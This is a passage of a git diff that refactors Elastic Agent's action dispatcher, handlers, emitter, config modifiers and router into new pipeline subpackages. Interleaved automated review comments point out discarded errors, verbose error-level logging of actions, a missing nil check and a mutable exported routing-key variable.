store.FleetAcker) error { h.log.Debugf("handlerUnenroll: action '%+v' received", a) action, ok := a.(*fleetapi.ActionUnenroll) if !ok { 
@@ -31,8 +59,8 @@ func (h *handlerUnenroll) Handle(ctx context.Context, a action, acker fleetAcker } // Providing empty map will close all pipelines - noPrograms := make(map[routingKey][]program.Program) - h.dispatcher.Dispatch(a.ID(), noPrograms) + noPrograms := make(map[pipeline.RoutingKey][]program.Program) + h.dispatcher.Route(a.ID(), noPrograms) if !action.IsDetected { // ACK only events comming from fleet diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_upgrade.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_upgrade.go similarity index 72% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_upgrade.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_upgrade.go index a4940cfe55b..b0e2b65ff3a 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_upgrade.go 
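Review bot: The error returned by `h.dispatcher.Route(a.ID(), noPrograms)` is discarded, although `pipeline.Router.Route` is declared in this commit to return one. If closing the pipelines fails, the handler appears to go on to acknowledge the unenroll while programs may still be running, so fleet and the host would disagree about the agent's state. At minimum record it: `if err := h.dispatcher.Route(a.ID(), noPrograms); err != nil { h.log.Errorf("unenroll: closing pipelines failed: %v", err) }`. Whether the handler should return the error instead depends on the rest of Handle, which lies outside the hunk.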
@@ -2,25 +2,36 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" "fmt" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) +// Upgrade is a handler for UPGRADE action. // After running Upgrade agent should download its own version specified by action // from repository specified by fleet. -type handlerUpgrade struct { +type Upgrade struct { log *logger.Logger upgrader *upgrade.Upgrader } -func (h *handlerUpgrade) Handle(ctx context.Context, a action, acker fleetAcker) error { +// NewUpgrade creates a new Upgrade handler. +func NewUpgrade(log *logger.Logger, upgrader *upgrade.Upgrader) *Upgrade { + return &Upgrade{ + log: log, + upgrader: upgrader, + } +} + +// Handle handles UPGRADE action. +func (h *Upgrade) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerUpgrade: action '%+v' received", a) action, ok := a.(*fleetapi.ActionUpgrade) if !ok { diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_default.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_default.go new file mode 100644 index 00000000000..37872094233 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_default.go 
@@ -0,0 +1,31 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package handlers
+
+import (
+ "context"
+
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi"
+)
+
+// Default is a default handler.
+type Default struct {
+ log *logger.Logger
+}
+
+// NewDefault creates a new Default handler.
+func NewDefault(log *logger.Logger) *Default {
+ return &Default{
+ log: log,
+ }
+}
+
+// Handle is a default handler, no action is taken.
+func (h *Default) Handle(_ context.Context, a fleetapi.Action, acker store.FleetAcker) error {
+ h.log.Errorf("HandlerDefault: action '%+v' received", a)
+ return nil
+}
diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_unknown.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_unknown.go
new file mode 100644
index 00000000000..a99f7d33528
--- /dev/null
+++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_unknown.go
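Review bot: `Default.Handle` writes the whole action with `'%+v'` at error level, so every field of an action that no handler claimed lands in the agent log regardless of the debug setting. The action structs are not visible in this diff, so I cannot tell whether any of them carries values that should stay out of logs. The type and id are enough to diagnose a missing handler, for example `h.log.Errorf("HandlerDefault: unhandled action type '%s' id '%s'", a.Type(), a.ID())`, assuming `fleetapi.Action` exposes `Type()` as the mock actions in dispatcher_test.go suggest. `Unknown.Handle` in handler_unknown.go has the same line, and in both methods the unused `acker` parameter could be `_` like the context.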
@@ -0,0 +1,31 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Unknown is a handler for unrecognized actions. +type Unknown struct { + log *logger.Logger +} + +// NewUnknown creates a new Unknown handler. +func NewUnknown(log *logger.Logger) *Unknown { + return &Unknown{ + log: log, + } +} + +// Handle handles unkown actions, no action is taken. +func (h *Unknown) Handle(_ context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Errorf("HandlerUnknown: action '%+v' received", a) + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher.go similarity index 60% rename from x-pack/elastic-agent/pkg/agent/application/action_dispatcher.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher.go index 6aa8eda8caa..7a1ea23a42d 100644 --- a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package dispatcher import ( "context" 
@@ -10,30 +10,28 @@ import ( "reflect" "strings" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -type action = fleetapi.Action +type actionHandlers map[string]actions.Handler -type actionHandler interface { - Handle(ctx context.Context, a action, acker fleetAcker) error -} - -type actionHandlers map[string]actionHandler - -type actionDispatcher struct { +// ActionDispatcher processes actions coming from fleet using registered set of handlers. +type ActionDispatcher struct { ctx context.Context log *logger.Logger handlers actionHandlers - def actionHandler + def actions.Handler } -func newActionDispatcher(ctx context.Context, log *logger.Logger, def actionHandler) (*actionDispatcher, error) { +// New creates a new action dispatcher. +func New(ctx context.Context, log *logger.Logger, def actions.Handler) (*ActionDispatcher, error) { var err error if log == nil { - log, err = logger.New("action_dispatcher") + log, err = logger.New("action_dispatcher", false) if err != nil { return nil, err } @@ -43,7 +41,7 @@ func newActionDispatcher(ctx context.Context, log *logger.Logger, def actionHand return nil, errors.New("missing default handler") } - return &actionDispatcher{ + return &ActionDispatcher{ ctx: ctx, log: log, handlers: make(actionHandlers), @@ -51,7 +49,8 @@ func newActionDispatcher(ctx context.Context, log *logger.Logger, def actionHand }, nil } -func (ad *actionDispatcher) Register(a action, handler actionHandler) error { +// Register registers a new handler for action. +func (ad *ActionDispatcher) Register(a fleetapi.Action, handler actions.Handler) error { k := ad.key(a) _, ok := ad.handlers[k] if ok { 
@@ -61,18 +60,21 @@ func (ad *actionDispatcher) Register(a action, handler actionHandler) error { return nil } -func (ad *actionDispatcher) MustRegister(a action, handler actionHandler) { +// MustRegister registers a new handler for action. +// Panics if not successful. +func (ad *ActionDispatcher) MustRegister(a fleetapi.Action, handler actions.Handler) { err := ad.Register(a, handler) if err != nil { panic("could not register action, error: " + err.Error()) } } -func (ad *actionDispatcher) key(a action) string { +func (ad *ActionDispatcher) key(a fleetapi.Action) string { return reflect.TypeOf(a).String() } -func (ad *actionDispatcher) Dispatch(acker fleetAcker, actions ...action) error { +// Dispatch dispatches an action using pre-registered set of handlers. +func (ad *ActionDispatcher) Dispatch(acker store.FleetAcker, actions ...fleetapi.Action) error { if len(actions) == 0 { ad.log.Debug("No action to dispatch") return nil @@ -99,7 +101,7 @@ func (ad *actionDispatcher) Dispatch(acker fleetAcker, actions ...action) error return acker.Commit(ad.ctx) } -func (ad *actionDispatcher) dispatchAction(a action, acker fleetAcker) error { +func (ad *ActionDispatcher) dispatchAction(a fleetapi.Action, acker store.FleetAcker) error { handler, found := ad.handlers[(ad.key(a))] if !found { return ad.def.Handle(ad.ctx, a, acker) @@ -108,7 +110,7 @@ func (ad *actionDispatcher) dispatchAction(a action, acker fleetAcker) error { return handler.Handle(ad.ctx, a, acker) } -func detectTypes(actions []action) []string { +func detectTypes(actions []fleetapi.Action) []string { str := make([]string, len(actions)) for idx, action := range actions { str[idx] = reflect.TypeOf(action).String() 
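Review bot: `key` calls `reflect.TypeOf(a).String()`, and `reflect.TypeOf` returns a nil `Type` for a nil interface value, so a nil `fleetapi.Action` reaching `Register`, `MustRegister` or `dispatchAction` panics inside the dispatcher. Whether a nil action can arrive from the fleet decoder is not visible here, but the type is exported by this commit and the guard is cheap: in `Register`, `if a == nil { return errors.New("cannot register nil action") }`, and in `dispatchAction` hand a nil action to `ad.def` before computing the key. `detectTypes` in the last hunk of this file makes the same call per element and would need the same check.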
diff --git a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher_test.go similarity index 80% rename from x-pack/elastic-agent/pkg/agent/application/action_dispatcher_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher_test.go index dab1ac776e7..504778ad804 100644 --- a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher_test.go @@ -2,22 +2,26 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package dispatcher import ( "context" "testing" "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" ) type mockHandler struct { - received action + received fleetapi.Action called bool err error } -func (h *mockHandler) Handle(_ context.Context, a action, acker fleetAcker) error { +func (h *mockHandler) Handle(_ context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.called = true h.received = a return h.err @@ -42,11 +46,11 @@ func (m *mockActionOther) Type() string { return "mockActionOther" } func (m *mockActionOther) String() string { return "mockActionOther" } func TestActionDispatcher(t *testing.T) { - ack := newNoopAcker() + ack := noopacker.NewAcker() t.Run("Success to dispatch multiples events", func(t *testing.T) { def := &mockHandler{} - d, err := newActionDispatcher(context.Background(), nil, def) + d, err := New(context.Background(), nil, def) require.NoError(t, err) success1 := &mockHandler{} 
@@ -74,12 +78,13 @@ func TestActionDispatcher(t *testing.T) { t.Run("Unknown action are caught by the unknown handler", func(t *testing.T) { def := &mockHandler{} - d, err := newActionDispatcher(context.Background(), nil, def) + d, err := New(context.Background(), nil, def) require.NoError(t, err) action := &mockActionUnknown{} err = d.Dispatch(ack, action) + require.NoError(t, err) require.True(t, def.called) require.Equal(t, action, def.received) }) @@ -89,7 +94,7 @@ func TestActionDispatcher(t *testing.T) { success2 := &mockHandler{} def := &mockHandler{} - d, err := newActionDispatcher(context.Background(), nil, def) + d, err := New(context.Background(), nil, def) require.NoError(t, err) err = d.Register(&mockAction{}, success1) diff --git a/x-pack/elastic-agent/pkg/agent/application/emitter.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/controller.go similarity index 68% rename from x-pack/elastic-agent/pkg/agent/application/emitter.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/controller.go index 89310ddeb9d..d396385c488 100644 --- a/x-pack/elastic-agent/pkg/agent/application/emitter.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/controller.go @@ -2,14 +2,13 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package emitter import ( - "context" - "strings" "sync" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" 
@@ -19,28 +18,17 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -type decoratorFunc = func(*info.AgentInfo, string, *transpiler.AST, []program.Program) ([]program.Program, error) -type filterFunc = func(*logger.Logger, *transpiler.AST) error - type reloadable interface { Reload(cfg *config.Config) error } -type configModifiers struct { - Filters []filterFunc - Decorators []decoratorFunc -} - -type programsDispatcher interface { - Dispatch(id string, grpProg map[routingKey][]program.Program) error -} - -type emitterController struct { +// Controller is an emitter controller handling config updates. +type Controller struct { logger *logger.Logger agentInfo *info.AgentInfo controller composable.Controller - router programsDispatcher - modifiers *configModifiers + router pipeline.Router + modifiers *pipeline.ConfigModifiers reloadables []reloadable caps capabilities.Capability @@ -52,8 +40,33 @@ type emitterController struct { vars []*transpiler.Vars } -func (e *emitterController) Update(c *config.Config) error { - if err := InjectAgentConfig(c); err != nil { +// NewController creates a new emitter controller. +func NewController( + log *logger.Logger, + agentInfo *info.AgentInfo, + controller composable.Controller, + router pipeline.Router, + modifiers *pipeline.ConfigModifiers, + caps capabilities.Capability, + reloadables ...reloadable, +) *Controller { + init, _ := transpiler.NewVars(map[string]interface{}{}, nil) + + return &Controller{ + logger: log, + agentInfo: agentInfo, + controller: controller, + router: router, + modifiers: modifiers, + reloadables: reloadables, + vars: []*transpiler.Vars{init}, + caps: caps, + } +} + +// Update applies config change and performes all steps necessary to apply it. +func (e *Controller) Update(c *config.Config) error { + if err := info.InjectAgentConfig(c); err != nil { return err } 
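Review bot: `NewController` throws away the error from `transpiler.NewVars(map[string]interface{}{}, nil)`. If that call fails, `vars` starts out holding a nil `*transpiler.Vars`, and the failure would only surface later, during an update. The constructor has no error return, so either add one or state above the line why the call cannot fail for an empty mapping, after confirming that against NewVars. The local name `init` also reads like the package initializer; `initVars` would be clearer.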
@@ -94,7 +107,8 @@ func (e *emitterController) Update(c *config.Config) error { return e.update() } -func (e *emitterController) Set(vars []*transpiler.Vars) { +// Set sets the transpiler vars for dynamic inputs resolution. +func (e *Controller) Set(vars []*transpiler.Vars) { e.lock.Lock() ast := e.ast e.vars = vars @@ -108,7 +122,7 @@ func (e *emitterController) Set(vars []*transpiler.Vars) { } } -func (e *emitterController) update() error { +func (e *Controller) update() error { // locking whole update because it can be called concurrently via Set and Update method e.updateLock.Lock() defer e.updateLock.Unlock() @@ -154,39 +168,5 @@ func (e *emitterController) update() error { } } - return e.router.Dispatch(ast.HashStr(), programsToRun) -} - -func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router programsDispatcher, modifiers *configModifiers, caps capabilities.Capability, reloadables ...reloadable) (emitterFunc, error) { - log.Debugf("Supported programs: %s", strings.Join(program.KnownProgramNames(), ", ")) - - init, _ := transpiler.NewVars(map[string]interface{}{}) - ctrl := &emitterController{ - logger: log, - agentInfo: agentInfo, - controller: controller, - router: router, - modifiers: modifiers, - reloadables: reloadables, - vars: []*transpiler.Vars{init}, - caps: caps, - } - err := controller.Run(ctx, func(vars []*transpiler.Vars) { - ctrl.Set(vars) - }) - if err != nil { - return nil, errors.New(err, "failed to start composable controller") - } - return func(c *config.Config) error { - return ctrl.Update(c) - }, nil -} - -func readfiles(files []string, emitter emitterFunc) error { - c, err := config.LoadFiles(files...) - if err != nil { - return errors.New(err, "could not load or merge configuration", errors.TypeConfig) - } - - return emitter(c) + return e.router.Route(ast.HashStr(), programsToRun) } 
diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter.go
new file mode 100644
index 00000000000..8b49bffea44
--- /dev/null
+++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter.go
@@ -0,0 +1,36 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package emitter
+
+import (
+ "context"
+ "strings"
+
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config"
+ "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger"
+)
+
+// New creates a new emitter function.
+func New(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router pipeline.Router, modifiers *pipeline.ConfigModifiers, caps capabilities.Capability, reloadables ...reloadable) (pipeline.EmitterFunc, error) {
+ log.Debugf("Supported programs: %s", strings.Join(program.KnownProgramNames(), ", "))
+
+ ctrl := NewController(log, agentInfo, controller, router, modifiers, caps, reloadables...)
+ err := controller.Run(ctx, func(vars []*transpiler.Vars) {
+ ctrl.Set(vars)
+ })
+ if err != nil {
+ return nil, errors.New(err, "failed to start composable controller")
+ }
+ return func(c *config.Config) error {
+ return ctrl.Update(c)
+ }, nil
+}
diff --git a/x-pack/elastic-agent/pkg/agent/application/emitter_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter_test.go similarity index 92% rename from x-pack/elastic-agent/pkg/agent/application/emitter_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter_test.go index 7c1975fef64..a38b1bb1ded 100644 --- a/x-pack/elastic-agent/pkg/agent/application/emitter_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter_test.go @@ -2,4 +2,4 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package emitter diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_decorator.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/fleet_decorator.go similarity index 93% rename from x-pack/elastic-agent/pkg/agent/application/fleet_decorator.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/fleet_decorator.go index e2c4a2941bf..688f8423a4f 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_decorator.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/fleet_decorator.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package modifiers import ( "fmt" 
@@ -15,7 +15,8 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -func injectFleet(cfg *config.Config, hostInfo types.HostInfo, agentInfo *info.AgentInfo) func(*logger.Logger, *transpiler.AST) error { +// InjectFleet injects fleet metadata into a configuration. +func InjectFleet(cfg *config.Config, hostInfo types.HostInfo, agentInfo *info.AgentInfo) func(*logger.Logger, *transpiler.AST) error { return func(logger *logger.Logger, rootAst *transpiler.AST) error { ecsMeta, err := agentInfo.ECSMetadata() if err != nil { diff --git a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator.go similarity index 89% rename from x-pack/elastic-agent/pkg/agent/application/monitoring_decorator.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator.go index ab9ff6bbc63..5c1d2d037fd 100644 --- a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package modifiers import ( "crypto/md5" @@ -14,7 +14,8 @@ import ( ) const ( - monitoringName = "FLEET_MONITORING" + // MonitoringName is a name used for artificial program generated when monitoring is needed. + MonitoringName = "FLEET_MONITORING" programsKey = "programs" monitoringChecksumKey = "monitoring_checksum" monitoringKey = "agent.monitoring" 
@@ -31,16 +32,16 @@ const ( defaultOutputName = "default" ) -func injectMonitoring(agentInfo *info.AgentInfo, outputGroup string, rootAst *transpiler.AST, programsToRun []program.Program) ([]program.Program, error) { +// InjectMonitoring injects a monitoring configuration into a group of programs if needed. +func InjectMonitoring(agentInfo *info.AgentInfo, outputGroup string, rootAst *transpiler.AST, programsToRun []program.Program) ([]program.Program, error) { var err error monitoringProgram := program.Program{ Spec: program.Spec{ - Name: monitoringName, - Cmd: monitoringName, + Name: MonitoringName, + Cmd: MonitoringName, }, } - config := make(map[string]interface{}) // if monitoring is not specified use default one where everything is enabled if _, found := transpiler.Lookup(rootAst, monitoringKey); !found { monitoringNode := transpiler.NewDict([]transpiler.Node{ @@ -70,7 +71,7 @@ func injectMonitoring(agentInfo *info.AgentInfo, outputGroup string, rootAst *tr return programsToRun, err } - config, err = ast.Map() + config, err := ast.Map() if err != nil { return programsToRun, err } diff --git a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator_test.go similarity index 96% rename from x-pack/elastic-agent/pkg/agent/application/monitoring_decorator_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator_test.go index e23027e62fc..8b93fe76280 100644 --- a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package modifiers import ( "fmt" 
@@ -35,7 +35,7 @@ func TestMonitoringInjection(t *testing.T) { GROUPLOOP: for group, ptr := range programsToRun { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, ast, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, ast, ptr) if err != nil { t.Error(err) continue GROUPLOOP @@ -47,7 +47,7 @@ GROUPLOOP: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -114,7 +114,7 @@ func TestMonitoringInjectionDefaults(t *testing.T) { GROUPLOOP: for group, ptr := range programsToRun { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, ast, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, ast, ptr) if err != nil { t.Error(err) continue GROUPLOOP @@ -126,7 +126,7 @@ GROUPLOOP: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -193,7 +193,7 @@ func TestMonitoringInjectionDisabled(t *testing.T) { GROUPLOOP: for group, ptr := range programsToRun { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, ast, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, ast, ptr) if err != nil { t.Error(err) continue GROUPLOOP @@ -205,7 +205,7 @@ GROUPLOOP: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -299,7 +299,7 @@ func TestChangeInMonitoringWithChangeInInput(t *testing.T) { GROUPLOOPBEFORE: for group, ptr := range programsToRunBefore { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, astBefore, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, astBefore, ptr) if err != nil { t.Error(err) continue GROUPLOOPBEFORE @@ -311,7 +311,7 @@ GROUPLOOPBEFORE: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } 
@@ -322,7 +322,7 @@ GROUPLOOPBEFORE: GROUPLOOPAFTER: for group, ptr := range programsToRunAfter { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, astAfter, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, astAfter, ptr) if err != nil { t.Error(err) continue GROUPLOOPAFTER @@ -334,7 +334,7 @@ GROUPLOOPAFTER: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/pipeline.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/pipeline.go new file mode 100644 index 00000000000..8286c1ee3a4 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/pipeline.go 
@@ -0,0 +1,65 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package pipeline + +import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// ConfigHandler is capable of handling configrequest. +type ConfigHandler interface { + HandleConfig(configrequest.Request) error + Close() error + Shutdown() +} + +// DefaultRK default routing keys until we implement the routing key / config matrix. +var DefaultRK = "default" + +// RoutingKey is used for routing as pipeline id. +type RoutingKey = string + +// Router is an interace routes programs to correspongind stream +type Router interface { + Route(id string, grpProg map[RoutingKey][]program.Program) error + Shutdown() +} + +// StreamFunc creates a stream out of routing key. +type StreamFunc func(*logger.Logger, RoutingKey) (Stream, error) + +// Stream is capable of executing configrequest change. +type Stream interface { + Execute(configrequest.Request) error + Close() error + Shutdown() +} + +// EmitterFunc emits configuration for processing. +type EmitterFunc func(*config.Config) error + +// DecoratorFunc is a func for decorating a retrieved configuration before processing. 
+type DecoratorFunc = func(*info.AgentInfo, string, *transpiler.AST, []program.Program) ([]program.Program, error) + +// FilterFunc is a func for filtering a retrieved configuration before processing. +type FilterFunc = func(*logger.Logger, *transpiler.AST) error + +// ConfigModifiers is a collections of filters and decorators applied while processing configuration. +type ConfigModifiers struct { + Filters []FilterFunc + Decorators []DecoratorFunc +} + +// Dispatcher processes actions coming from fleet api. +type Dispatcher interface { + Dispatch(acker store.FleetAcker, actions ...fleetapi.Action) error +} diff --git a/x-pack/elastic-agent/pkg/agent/application/router.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router.go similarity index 79% rename from x-pack/elastic-agent/pkg/agent/application/router.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/router/router.go index 3da840a2a3d..6c7a27a2bd9 100644 --- a/x-pack/elastic-agent/pkg/agent/application/router.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router.go 
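Review bot: `DefaultRK` is declared as an exported package-level `var`, so any package that imports `pipeline` can reassign the default routing key at runtime. Nothing visible in this diff needs it to be mutable, so `const DefaultRK RoutingKey = "default"` would be the safer declaration. The value also changes from "DEFAULT" to "default", which appears to be what reorders the expected events in router_test.go; a short comment on the declaration saying that routes are processed in sorted key order would explain that. The doc comment on `Router` has two typos and could read `// Router routes programs to the corresponding stream.`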
@@ -2,42 +2,31 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package router import ( "fmt" "strings" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/sorted" ) -// defautlRK default routing keys until we implement the routing key / config matrix. -var defautlRK = "DEFAULT" - -type routingKey = string - -type stream interface { - Execute(configrequest.Request) error - Close() error - Shutdown() -} - -type streamFunc func(*logger.Logger, routingKey) (stream, error) - type router struct { log *logger.Logger routes *sorted.Set - streamFactory streamFunc + streamFactory pipeline.StreamFunc } -func newRouter(log *logger.Logger, factory streamFunc) (*router, error) { +// New creates a new router. +func New(log *logger.Logger, factory pipeline.StreamFunc) (pipeline.Router, error) { var err error if log == nil { - log, err = logger.New("router") + log, err = logger.New("router", false) if err != nil { return nil, err } @@ 